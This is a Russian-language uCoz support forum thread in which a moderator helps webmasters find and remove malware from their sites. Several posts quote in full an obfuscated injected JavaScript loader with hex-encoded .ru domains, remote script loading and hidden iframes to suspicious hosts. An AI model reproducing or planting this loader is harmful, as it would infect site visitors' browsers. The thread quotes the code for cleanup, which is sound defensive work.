Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика) |
| Вирусы на сайтах |
|
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
|
AOV, материалы http://tehnologiya4.ucoz.ru/load....-0-1407
http://tehnologiya4.ucoz.ru/load....-0-1406 http://tehnologiya4.ucoz.ru/load....-0-1404 http://tehnologiya4.ucoz.ru/load....-0-1402 http://tehnologiya4.ucoz.ru/load....-0-1400 заражены открыть каждый на редактирование - перейти в хтмл панель и удалить код Код <script>window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10251",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("tehnologiya4.ucoz.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe id="a1996667054" src="https://bw95vpjda.ru/f.html" style="display: none;"></iframe> из каждого |
|
webanet, но я вам давала другой адрес....http://tehnologiya.ucoz.ru
Но спасибо и за помощь по другому моему сайту. |
|
AOV,
Цитата но я вам давала другой адрес материал http://tehnologiya.ucoz.ru/board....1-0-296 заражен. перейти в редактирование в панель хтмл и удалить конструкцию Код <script>window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10251",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("tehnologiya.ucoz.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe id="a1996667054" src="https://al9l235gkc7d.ru/f.html" style="display: none;"></iframe> <script>window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10251",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("tehnologiya.ucoz.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe id="a1996667054" src="https://al9l235gkc7d.ru/f.html" style="display: none;"></iframe> тоже самое на этой странице http://tehnologiya.ucoz.ru/index/0-201 откройте на редактирование перейдите в панель хтмл кодов и удалите тоже самое. остальное по опросам пользователей, где срабатывает у них антивирус, ибо я не могу ориентироваться в вашем сайте вообще |
|
AOV, http://tehnologiya.ucoz.ru/index/0-3 тут тоже удалите
Код <script>window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10251",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("tehnologiya.ucoz.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe id="a1996667054" src="https://ui5nvtxlm.ru/f.html" style="display: none;"></iframe> |
|
Привет. Создавал вопрос в соседней ветке мне не ответили.
Я просматривая загрузку главной страницы наблюдаю погрузку скриптов парнерок рекламных которых не когда не устанавливал, на сайте удалена вся реклама еще пол года назад, не чего чужого на странице главной не установлено, вопрос откуда эта гадость подгружается? или это uCoz от себя добавляет? Просматриваю подгруздку под гостем, сайт filmsd.ru страница главная вот что наковырял, скрин так же прилагаю. Код http://js.advideo.ru/aro.js http://cm.marketgid.com/m?dsp=110050&cdsp=271315&c=ef67c2e8-aaf3-11e4-a29d-002590c824a4&is_init=1 http://pix-00.tizerbank.com/pixel/tz/6YT9k?0.32017778558656573 http://sync.bumlam.com/?src=mirs1&uid=f6oX0KWuKko9 http://dl.metabar.ru/static/storage/index.html?version=201509101441 http://s.ytimg.com/yts/jsbin/player-ru_RU-vflP-kCJo/base.js http://dl.metabar.ru/static/storage/js/clear-storage.js http://static.doubleclick.net/instream/ad_status.js  Прикрепления:
5004518.png
(313.4 Kb)
Сообщение отредактировал liubomir - Понедельник, 23 Ноя 2015, 20:17:00
|
|
liubomir, сделайте бекап шаблонов на всякий. потом с помощью быстрой замены или в ручном режиме хотя бы на главной удалите закрывающий хтмл </html> - сохраните шаблон. отпишитесь о результатах. прочитать что это такое можно тут //forum.ucoz.ru/forum/45-72059-1
часть неприятностей и отсюда тоже Код <script type="text/javascript"> var test, url = "http://allserials.tv/getfile.php?file=Qubool.Hai.2012"; test = url.split('/')[02]; $('#url24096').html('| 2 плеер: <b>'+test); </script> часть кода который вы предоставили к главной не относится вообще. вот этот например http://js.advideo.ru/aro.js о нем можно почитать тут //forum.ucoz.ru/forum/30-73879-1 плееры от http://hqq.tv/ напичканы рекламой, чаще чем реже агрессивной поэтому то что я сказала сделать решит только часть ваших проблем. остальное вы сами поставили |
|
webanet, Я чуть не поперхнулся почитав информацию, я в шоке прочитал о том что внедряется скрипт advideo.ru независимо от тематики твоей и типа сайта, но используя само-выгоду uCoz обязан спросить вебмастера и решить юридический этот вопрос, выходит Вебмастер платит деньги за пакет, + так же изымает деньги через свои код как бы ты не пытался работать на прямую с advideo.ru
Выходит не один Вебмастер не хозяин своего сайта, он просто арендатор или прохожий, что касается контента то он удаляется добросовестными веб мастерами всегда, если uCoz решил так обезопасится и выгоду получить, то вебмастера реальные уйдут там где им не подкладывают свинью и создают соглашение оговаривая данное действие. Я всегда защищал uCoz а теперь буду осваивать другие CMS в поисках альтернативы, тем более данный код вероятно посадил мой сайт вбан и за редиректа от плеера. |
|
liubomir, в бан поисковые системы садят сайты за плееры от hqq.tv. но не было ни одного случая бана за http://js.advideo.ru/aro.js
|
|
webanet, не буду с вами спорить, но http://js.advideo.ru/aro.js не делает uCoz лучше, я всегда не понимал причину того что лучшие умы в CMS по uCoz уходят на другие системы, теперь все очевидно ты не являешься хозяином собственного сайта даже оплачивая прем пакеты, тебе без спроса могут вложить все что угодно.по этому слово ЛУЧШЕЕ это uCoz уже трудно произнести.
с плеером hqq.tv я не работаю уже значительно давно, остатки этого плеера на сайте стараюсь заменить, так как его владелец глупый и упертый человек не читающий о своем умирающем проекте что пишут на форумах люди живые. Не могу вывести сайт из под банна google и за поиска проблем натыкаюсь на разный мусор и не справедливость, уже хочется забросить все этого, пустая трата времени гугл тупит но не пишет причину понятную в принципе как и тут абуза, банят и ржут над чайником который не может понять причину месяцами. |
|
liubomir, я вам назвала причину бана гугла. и на указанный плеер я наткнулась сразу, не искала долго. и плеер от allserials.tv ещё меньше украшает сайт с его мобильными редиректами от которых гугл звереет. у вас два самых " любимых " плеера гугла, но почему-то у вас виновен скрипт адвидео
а скрипт адвидео - это выход для всех. про борьбу с пиратским контентом конечно не слышали? и как эта борьба ведется тоже не знаете? очень плохо а если у вас не запрещенный контент, то можно всегда написать в тех.поддержку и они для пушистого сайта отключат. ну или своими руками тоже можно, но не нужно прислушайтесь. конечно простое решение проблемы - это виноват кто-то, а не я. но вы со своими плеерами даже без несчастного адвидео не выберетесь из бана гугла. поверьте мне. я вам все рассказала подробно, а дальше флуд тут не нужен. это скучная тема. ею она и останется. |
|
День добрый у меня поначалу заблокировали сайт http://mirfentezy.ru по причине молваре. Гугл пишет Сведения о безопасности сайта
 Некоторые страницы на этом сайте устанавливают вредоносное ПО на компьютеры посетителей.Ну ладно я начал лазить по страницам и нашол на кождой стронице вот это<?if(($MODULE_ID$ != 'tests') && ($PAGE_ID$ != 'add'))?><script type="text/javascript">jQuery(document).ready(function(){$(":radio").addClass('niceRadio');jQuery(".niceRadio").each(function() {changeRadioStart(jQuery(this));});});function changeRadio(el){var el = el,input = el.find("input").eq(0);var nm=input.attr("name");jQuery(".niceRadio input").each(function() {if(jQuery(this).attr("name")==nm) {jQuery(this).parent().removeClass("radioChecked");}});if(el.attr("class").indexOf("niceRadioDisabled")==-1) {el.addClass("radioChecked");input.attr("checked", true);}return true;}function changeVisualRadio(input){var wrapInput = input.parent();var nm=input.attr("name");jQuery(".niceRadio input").each(function() {if(jQuery(this).attr("name")==nm){jQuery(this).parent().removeClass("radioChecked");}});if(input.attr("checked")){wrapInput.addClass("radioChecked");}}function changeRadioStart(el){try{var el = el,radioName = el.attr("name"),radioId = el.attr("id"),radioChecked = el.attr("checked"),radioDisabled = el.attr("disabled"),radioTab = el.attr("tabindex"),radioValue = el.attr("value");var radioClick = el.attr("onclick");if (el.attr("onclick")) {radioClick = "onmouseup='button_activate();'";}else { radioClick = "";}if(radioChecked)el.after("<span class='niceRadio radioChecked'"+radioClick+">"+"<input type='radio'"+"name='"+radioName+"'"+"id='"+radioId+"'"+"checked='"+radioChecked+"'"+"tabindex='"+radioTab+"'"+"value='"+radioValue+"' /></span>");elseel.after("<span class='niceRadio'"+radioClick+">"+"<input type='radio'"+"name='"+radioName+"'"+"id='"+radioId+"'"+"tabindex='"+radioTab+"'"+"value='"+radioValue+"' /></span>"); if(radioDisabled){el.next().addClass("niceRadioDisabled");el.next().find("input").eq(0).attr("disabled","disabled");} el.next().bind("mousedown", function(e) { changeRadio(jQuery(this)) });el.next().find("input").eq(0).bind("change", function(e) { changeVisualRadio(jQuery(this)) });if(jQuery.browser.msie){el.next().find("input").eq(0).bind("click", function(e) { changeVisualRadio(jQuery(this)) });}el.remove();}catch(e){}return true;}</script><?endif?> Чтой то такое подскажите пожалуйста? |
|
с фирефокса жалуются что на сайте http://exscluziv.ucoz.net/ вирус.. браузер фирефокс блокирует сайт не пропускает в поисковике яндекс вписываю Эксклюзив мастеров анимации и сайт серым отмечен завирусован...помогите найти какой вирус на сайте
Прикрепления:
6923459.jpg
(37.2 Kb)
Сообщение отредактировал Leyla - Четверг, 10 Дек 2015, 20:32:38
|
|
Leyla, проблемы на вашем сайте из-за того, что на вашем сайте есть картинки или ссылки с сайтов, которые находятся в черном списке яндекса. а стороннего на вашем сайте слишком много. зайдите в вебмастер - безопасность и посмотрите что там пишет яндекс.
|
| |||